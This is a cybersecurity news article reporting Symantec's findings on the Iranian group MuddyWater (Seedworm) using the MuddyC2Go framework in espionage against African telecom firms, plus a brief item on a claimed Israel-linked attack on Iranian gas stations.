Iranian hackers use MuddyC2Go in telecom espionage attacks across Africa

Iranian Hackers

The Iranian nation-state actor known as Muddy water has used a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan and Tanzania.

The Symantec Threat Hunter Team, part of Broadcom, is to follow the activity under the name Seedworm, which is also tracked under the names Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros and Yellow Nix.

MuddyWater has been operating since at least 2017 and is believed to have ties to Iran’s Ministry of Intelligence and Security (MOIS), mainly singling out entities in the Middle East.

The cyber espionage group’s use of MuddyC2Go was first highlighted last month by Deep Instinct, which described it as a Golang-based replacement for PhonyC2, itself a successor to MuddyC3. However, there are indications that it may have been applied as early as 2020.

While the full extent of MuddyC2Go’s capabilities is not yet known, the executable is equipped with a PowerShell script that automatically connects to Seedworm’s C2 server, giving the attackers remote access to a victim system and eliminating the need for manual execution by an operator is avoided.

The latest series of intrusions, which took place in November 2023, were also found to rely on SimpleHelp and Venom Proxy, in addition to a custom keylogger and other publicly available tools.

The attack chains established by the group have a track record of weaponizing phishing emails and known vulnerabilities in unpatched applications for initial access, followed by conducting reconnaissance, lateral movement, and data collection.

The attacks on an unnamed telecommunications organization documented by Symantec used the MuddyC2Go launcher to contact an actor-controlled server, while also deploying legitimate remote access software such as AnyDesk and SimpleHelp.

The entity is said to have been compromised by the adversary earlier in 2023, using SimpleHelp to launch PowerShell, provide proxy software and also install the JumpCloud remote access tool.

“At another telecommunications and media company targeted by the attackers, multiple incidents of SimpleHelp were used to connect to known Seedworm infrastructure,” Symantec said. “A customized version of the Venom proxy A hacking tool was also run on this network, as well as the new custom keylogger used by the attackers in this activity.”

By using a combination of customized, native and publicly available tools in its attack chains, the goal is to evade detection for as long as possible to achieve its strategic objectives, the company said.

“The group continues to innovate and evolve its toolset as needed to keep its operations under the radar,” concluded Symantec. “The group continues to make heavy use of PowerShell and PowerShell-related tools and scripts, underscoring the need for organizations to be aware of suspicious PowerShell use on their networks.”

The development comes as an Israel-linked group called Gonjeshke Darande (which means ‘predatory sparrow’ in Persian) claimed responsibility for a cyberattack that disrupted a “majority of gas pumps across Iran” in response to the “aggression of the Islamic Republic and its allies in the region.”

It is believed that the group, which resurfaced in October 2023 after being silent for almost a year, is linked to the Israeli Directorate of Military Intelligence, with executed destructive attacks in Iran, incl steel facilities, Gasoline stationsand railway networks in the country.


#Iranian #hackers #MuddyC2Go #telecom #espionage #attacks #Africa

Notify of
Inline Feedbacks
View all comments
Previous Post
GitHub to Evade Detection

Hackers exploit GitHub to evade detection and monitor compromised hosts

Next Post
Malvertising Campaign

New malvertising campaign distributing PikaBot disguised as popular software

Related Posts